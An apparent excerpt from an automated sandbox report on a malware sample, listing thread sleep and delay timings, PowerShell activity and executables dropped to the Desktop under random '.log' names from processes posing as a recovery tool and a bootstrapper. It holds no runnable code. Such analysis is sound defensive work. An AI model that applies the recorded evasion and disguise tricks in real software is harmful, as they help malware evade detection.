Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 590547
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 300000
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 590276
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 590016
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 589625
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 589219
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 588766
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 588406
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 587860
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 587516
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 586985
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 586594
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 586047
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 585657
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 584922
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 584438
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 584256
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 584089
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583958
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583822
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583699
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583554
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583393
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583250
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583125
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582995
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582868
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582764
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582654
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582532
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582375
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582238
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582094
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581971
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581831
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581704
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581578
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581425
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581297
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581113
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580579
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580374
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580266
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580154
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580039
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579875
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579719
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579485
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579345
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579204
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579094
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 578969
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 578840

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Window / User API: threadDelayed 7479	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Window / User API: threadDelayed 2375	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1485
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1582
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1227
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1266
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1065
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1750
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2021
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1294
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1048
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1013
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1289
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1999
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1145
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2542
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1367
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1337
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Window / User API: threadDelayed 9416

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QWdDhtsw.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wLNGnQCR.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FtgWXsHz.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qHDXlZnr.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nFQoPqiw.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gjQRaIsv.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VMFLzOzY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GnKnxRmO.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -598686s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -598233s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597249s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595929s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595780s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep count: 1485 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep count: 1582 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep count: 1227 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8700	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8452	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep count: 1266 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8764	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756	Thread sleep count: 1065 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8720	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep count: 1750 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep count: 1447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8424	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904	Thread sleep count: 2021 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8732	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep count: 1241 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8748	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8500	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128	Thread sleep count: 1294 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8772	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5184	Thread sleep count: 1048 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144	Thread sleep count: 1013 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8752	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188	Thread sleep count: 1289 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8704	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8492	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep count: 1999 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8708	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep count: 1145 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1880	Thread sleep count: 2542 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8712	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8232	Thread sleep count: 1367 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8220	Thread sleep count: 1337 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe TID: 2088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe TID: 1664	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 4444	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 5696	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 5632	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -599860s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -599454s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -598797s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -598516s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -597922s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -597547s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 2708	Thread sleep time: -28800000s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -597047s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -596547s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -596157s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -595532s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -595329s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -594954s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -594709s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -594547s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -594110s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -593735s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -593464s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -592922s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -592657s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -592344s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -591969s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -591625s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -591172s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -590547s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 2708	Thread sleep time: -300000s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -590276s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -590016s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -589625s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -589219s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -588766s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -588406s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -587860s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -587516s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -586985s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -586594s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -586047s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -585657s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -584922s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -584438s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -584256s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -584089s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -583958s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -583822s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -583699s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -583554s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -583393s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -583250s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -583125s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -582995s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -582868s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -582764s >= -30000s
